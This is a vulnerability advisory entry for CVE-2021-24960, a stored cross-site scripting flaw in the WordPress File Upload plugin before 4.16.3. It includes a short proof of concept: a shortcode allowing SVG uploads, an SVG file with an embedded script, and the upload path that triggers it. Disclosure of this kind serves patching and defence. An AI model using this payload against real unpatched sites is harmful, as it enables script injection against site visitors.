WordPress Plugin Vulnerabilities

WordPress File Upload < 4.16.3 - Contributor+ Stored Cross-Site Scripting via Malicious SVG

Description

The plugin allows users with a role as low as Contributor to configure the upload form in a way that allows uploading of SVG files, which could be then be used for Cross-Site Scripting attacks

Proof of Concept

1. As a contributor (or above) add the following shortcode to a post: [wordpress_file_upload uploadpatterns="*.svg"]
2. Preview/view the post and upload the following xss.svg file <svg xmlns:svg="http://www.w3.org/2000/svg"><svg:script>alert(/XSS/)</svg:script></svg>
3. Go to /wp-content/uploads/xss.svg to trigger the XSS

Affects Plugins

Plugin icon
wp-file-upload
Fixed in 4.16.3
Plugin icon
wordpress-file-upload-pro
Fixed in 4.16.3

References

CVE
CVE-2021-24960
URL
https://plugins.trac.wordpress.org/changeset/2677722

Miscellaneous

Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
18902832-2973-498d-808e-c75d1aedc11e

Timeline

Publicly Published
2022-02-14 (about 2 years ago)
Added
2022-02-14 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)

Other

Published
Title
Published
2023-10-16
Title
WooCommerce Ninja Forms Product Add-ons < 1.7.1 - Unauthenticated Arbitrary File Upload
Published
2014-08-01
Title
WP Marketplace 1.2.1 - File Enumeration Weakness & File Upload Vulnerabilities
Published
2014-08-01
Title
File Uploader - PHP File Upload
Published
2021-07-29
Title
WordPress Download Manager < 3.1.25 - Authenticated File Upload
Published
2021-08-16
Title
Email Artillery <= 4.1 - Arbitrary File Upload